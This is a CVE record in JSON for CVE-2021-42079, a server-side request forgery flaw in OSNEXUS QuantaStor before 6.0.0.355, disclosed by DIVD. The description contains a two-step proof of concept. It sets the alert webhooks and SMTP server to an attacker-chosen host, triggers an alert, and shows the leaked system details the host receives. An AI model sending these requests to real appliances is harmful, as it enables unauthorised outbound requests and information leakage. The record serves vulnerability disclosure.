{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T03:22:00.000Z",
          "orgId": "00000000-0000-4000-9000-000000000000",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.wbsec.nl/osnexus"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.divd.nl/DIVD-2021-00020"
          },
          {
            "tags": [
              "product",
              "x_transferred"
            ],
            "url": "https://www.osnexus.com/products/software-defined-storage"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-42079"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-42079",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-04T20:06:08.530050Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-04T20:06:00.000Z",
          "orgId": "00000000-0000-4000-9000-000000000000",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://www.osnexus.com/downloads",
          "defaultStatus": "unknown",
          "platforms": [
            "Windows",
            "Linux"
          ],
          "product": "QuantaStor",
          "vendor": "OSNEXUS",
          "versions": [
            {
              "lessThan": "6.0.0.355",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Wietse Boonstra (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Frank Breedijk (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Pasman (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Gevers (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Max van der Horst (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Célistine Oosting (DIVD)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br><br>POC<br><br>Step 1: Prepare the SSRF with a request like this:<br><br><code><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertConfigSet?senderEmailAddress=a&amp;smtpServerIpAddress=BURPCOLLABHOST&amp;smtpServerPort=25&amp;smtpUsername=a&amp;smtpPassword=1&amp;smtpAuthType=1&amp;customerSupportEmailAddress=1&amp;poolFreeSpaceWarningThreshold=1&amp;poolFreeSpaceAlertThreshold=1&amp;poolFreeSpaceCriticalAlertThreshold=1&amp;pagerDutyServiceKey=1&amp;slackWebhookUrl=</span>http://&lt;target&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">&amp;enableAlertTypes&amp;enableAlertTypes=1&amp;disableAlertTypes=1&amp;pauseAlertTypes=1&amp;mattermostWebhookUrl=</span>http://&lt;TARGET&gt;<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\nAccept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br>\nConnection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 0</span></code><br><code><br>Step 2: Trigger this alert with this request<br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertRaise?title=test&amp;message=test&amp;severity=1 <br>HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\n<br>Accept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n<br>Connection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 1<br><br></span></code>The post request received by &lt;TARGET&gt; looks like this:<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">{<br> \n### Python FLASK stuff ####\n<br> 'endpoint': 'index', <br> \n'method': 'POST', <br> \n'cookies': ImmutableMultiDict([]), <br> \n### END Python FLASK stuff ####\n<br> \n'data': b'{ <br>  \"attachments\": [ <br>   {\n<br>    \"fallback\": \"[122] test / test.\",\n<br>    \"color\": \"#aa2222\",\n<br>    \"title\": \"[122] test\",\n<br>    \"text\": \"test\",\n<br>    \"fields\": [ &nbsp; <br>     { &nbsp; &nbsp;\n<br>      \"title\": \"Alert Severity\",\n     &nbsp; &nbsp;<br>      \"value\": \"CRITICAL\",\n     &nbsp; &nbsp;<br>      \"short\": false &nbsp;<br>     }, &nbsp;{ &nbsp; <br>      \"title\": \"Appliance\", &nbsp; &nbsp; <br>      \"value\": \"quantastor (</span>https://&lt;HOSTNAME&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">)\",\n  &nbsp; &nbsp; <br>      \"short\": true &nbsp;\n<br>     }, &nbsp;{ &nbsp; &nbsp;\n<br>      \"title\": \"System / Driver / Kernel Ver\", &nbsp; &nbsp;\n<br>      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", &nbsp; &nbsp;\n<br>      \"short\": false &nbsp;\n<br>     }, &nbsp;{ &nbsp; &nbsp;\n<br>      \"title\": \"System Startup\", &nbsp; &nbsp;\n<br>      \"value\": \"Fri Aug &nbsp;6 16-02-55 2021\", &nbsp; &nbsp;\n<br>      \"short\": true &nbsp;\n<br>          }, &nbsp;{ &nbsp; &nbsp;\n<br>      \"title\": \"SSID\", &nbsp; &nbsp;\n<br>      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", &nbsp; &nbsp;\n<br>      \"short\": true &nbsp;\n<br>     },<br>    ],\n<br>    \"footer\": \"QuantaStor Call-home Alert\",\n<br>    \"footer_icon\": \"</span><a target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\">https://platform.slack-edge.com/img/default_application_icon.png</a><span style=\"background-color: rgba(29, 28, 29, 0.04);\">\",\n<br>    \"ts\": 1628461774<br>   }<br>  ], <br>  \"mrkdwn\":true <br> }', <br> #### FLASK REQUEST STUFF #####\n<br> 'headers': {\n<br>  'Host': '&lt;redacted&gt;', <br>  'User-Agent': 'curl/7.58.0', <br>  'Accept': '*/*', <br>  'Content-Type': 'application/json', <br>  'Content-Length': '790'\n<br> }, <br> 'args': ImmutableMultiDict([]), <br> 'form': ImmutableMultiDict([]), <br> 'remote_addr': '217.103.63.173', <br> 'path': '/payload/58', <br> 'whois_ip': 'TNF-AS, NL'<br>}\n<br>#### END FLASK REQUEST STUFF #####</span>"
            }
          ],
          "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>\nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by <TARGET> looks like this:\n{\n \n### Python FLASK stuff ####\n\n 'endpoint': 'index', \n \n'method': 'POST', \n \n'cookies': ImmutableMultiDict([]), \n \n### END Python FLASK stuff ####\n\n \n'data': b'{ \n  \"attachments\": [ \n   {\n\n    \"fallback\": \"[122] test / test.\",\n\n    \"color\": \"#aa2222\",\n\n    \"title\": \"[122] test\",\n\n    \"text\": \"test\",\n\n    \"fields\": [   \n     {    \n\n      \"title\": \"Alert Severity\",\n        \n      \"value\": \"CRITICAL\",\n        \n      \"short\": false  \n     },  {   \n      \"title\": \"Appliance\",     \n      \"value\": \"quantastor (https://<HOSTNAME>)\",\n      \n      \"short\": true  \n\n     },  {    \n\n      \"title\": \"System / Driver / Kernel Ver\",    \n\n      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n\n      \"short\": false  \n\n     },  {    \n\n      \"title\": \"System Startup\",    \n\n      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n\n      \"short\": true  \n\n          },  {    \n\n      \"title\": \"SSID\",    \n\n      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n\n      \"short\": true  \n\n     },\n    ],\n\n    \"footer\": \"QuantaStor Call-home Alert\",\n\n    \"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n    \"ts\": 1628461774\n   }\n  ], \n  \"mrkdwn\":true \n }', \n #### FLASK REQUEST STUFF #####\n\n 'headers': {\n\n  'Host': '<redacted>', \n  'User-Agent': 'curl/7.58.0', \n  'Accept': '*/*', \n  'Content-Type': 'application/json', \n  'Content-Length': '790'\n\n }, \n 'args': ImmutableMultiDict([]), \n 'form': ImmutableMultiDict([]), \n 'remote_addr': '217.103.63.173', \n 'path': '/payload/58', \n 'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-11T13:40:00.000Z",
        "orgId": "00000000-0000-4000-9000-000000000000",
        "shortName": "DIVD"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory",
            "technical-description"
          ],
          "url": "https://www.wbsec.nl/osnexus"
        },
        {
          "tags": [
            "third-party-advisory",
            "exploit",
            "technical-description"
          ],
          "url": "https://cisrt.divd.nl/DIVD-2021-00020/"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://www.osnexus.com/products/software-defined-storage"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-42079"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
            }
          ],
          "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "00000000-0000-4000-9000-000000000000",
    "assignerShortName": "DIVD",
    "cveId": "CVE-2021-42079",
    "datePublished": "2023-07-10T06:29:00.000Z",
    "dateReserved": "2021-10-07T17:12:00.000Z",
    "dateUpdated": "2025-03-11T13:40:00.000Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}